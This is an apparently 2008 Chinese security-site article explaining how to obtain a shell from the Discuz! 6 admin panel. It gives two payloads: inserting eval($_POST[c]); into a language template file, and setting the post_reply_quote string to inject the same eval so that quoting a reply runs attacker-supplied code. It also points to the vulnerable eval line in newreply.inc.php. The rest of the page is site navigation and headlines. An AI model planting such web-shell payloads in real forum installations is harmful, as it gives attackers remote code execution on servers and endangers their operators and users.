通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
Discuz! 6 后台拿Shell的方法
责任编辑:酷酷の鱼   更新日期:2008-3-5
 

文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:
复制内容到剪贴板
代码:
eval("\$language[&#39;post_reply_quote&#39;] = \"$language[post_reply_quote]\";");
呵呵,一个天然的后门:)
PS:还有几个编辑模板的地方可以利用,和第二种方法类似。

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 一日一动画稿费100元起
    普通文章 瑞星公司03月05日发布 每日计算机病毒及木马播报
    推荐文章 推荐:XSS攻击Cookie欺骗中隐藏JavaScript执行
    普通文章 如何使电脑无法更改系统用户名
    普通文章 Discuz! 6 后台拿Shell的方法
    普通文章 设置Web邮箱黑客警报器 防止财务损失
    普通文章 针对性防御手段 十招教你应对邮件欺诈
    普通文章 使用360安全卫士 教你五分钟搞定装机
    普通文章 企业用户防御网络威胁十要素
    普通文章 安全你我他:IPS与IDS技术路向何方?
    热门文章
    普通文章安全专家:社交网站已成滋生网络攻击的温床
    普通文章黑客组织发布新软件利用Google查找网站漏洞
    普通文章欧盟要求搜索引擎遵守规则保护用户IP地址
    普通文章ALEXA已恢复数据更新
    普通文章关注微软Windows XP SP3 RC2安全性
    普通文章盗号木马猖獗 用户账号需妥善管理
    普通文章桌面伪装木马发威 牧民远程控制作祟
    普通文章小心新病毒冒充杀毒软件 耍你没商量
    普通文章高手支招:电脑每天“洗澡”可防隐私被窥
    推荐文章推荐:步步为营保障安全:中毒后六大紧急措施
    精彩专题